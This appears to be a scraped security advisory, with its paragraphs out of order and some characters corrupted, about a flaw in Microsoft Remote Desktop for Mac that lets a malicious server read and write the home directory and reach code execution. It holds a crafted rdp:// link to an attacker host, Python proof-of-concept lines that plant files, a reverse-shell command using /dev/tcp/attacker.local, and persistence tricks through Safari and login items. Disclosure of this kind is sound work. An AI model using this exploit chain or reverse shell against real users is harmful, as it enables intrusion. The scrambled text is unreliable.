This fix is mentioned in the Apple Store: On Apple pushed a security uptate to Safari that prevents this exploit from working.
It’s also possible achieve Remote Code Execution by sending a single link to the victim if he/she uses Safari as the default browser. poison “loginitems” to launch the URL at system startup.poison Safari “Application Saved State” so that the URL il launched at browser execuition.poison Safari cache adding some javascript that launches the URL.send the link to the victim via Mail or iMessage.To automatically execute the triggering URL (ssh://p) we can either: Nohup bash -i >& /dev/tcp/attacker.local/1234 0 &Īt this point any attempt to launch ssh://p will lead to the execution of ~/.ssh/command.sh without any warning. P ssh-rsa AAAAB3NzaC1yc2EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA To execute arbitrary code on the target machine we can use a trick that involves ssh and ssh:// URI handler.Ĭonsider the following example where the RDC exploit pushes the following files on the remote machine: Runcmd('copy c:\\REMOTE.txt c:\\home\\REMOTE\\REMOTE.txt') Runcmd('MKLINK /D C:\\home \\\\tsclient\\home') Process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE) RDC link: rdp://full%20address=s:attacker.local&desktopwidth=i:200&desktopheight=i:200&audiomode=i:2&disable%20themes=i:1&screen%20mode%20id=i:1&devicestoredirect:s:*&drivestoredirect=s:*&redirectprinters=i:1&username=s:Administrator
install python2.7 and put the following script in the “Startup” folder.configure a trusted ssl certificate for rdp connections.install a windows 2008 server and allow Administrator to connect without password.To reproduce the issue follow the steps below: The following Proof Of Concept creates a directory on the victim’s home and puts a file into it.
Since Mac OS X by default opens rdp urls without confirmation (for example via Safari, Mail, Messages), a single click on a link it’s sufficient to trigger the vulnerability.Īccording to Microsoft, no CVE will be assigned due to the release model of this particular client. If an attacker can trick a user to open a malicious rdp url, he/she can read and write any file within the victim’s home directory. In the rdp url schema it’s possible to specify a parameter that will make the user’s home directory accessible to the server without any warning or confirmation request. The vulnerability exists to the way the application handles rdp urls.
Microsoft Remote Desktop Client for Mac OS X (ver 8.0.32 and probably prior) allows a malicious Terminal Server to read and write any file in the home directory of the connecting user.
User interaction is needed to exploit this issue, but a single click on a link (sent via mail, iMessage, etc.) is sufficient to trigger the vulnerability. A vulnerability exists in Microsoft Remote Desktop for Mac that allows a remote attacker to execute arbitrary code on the target machine.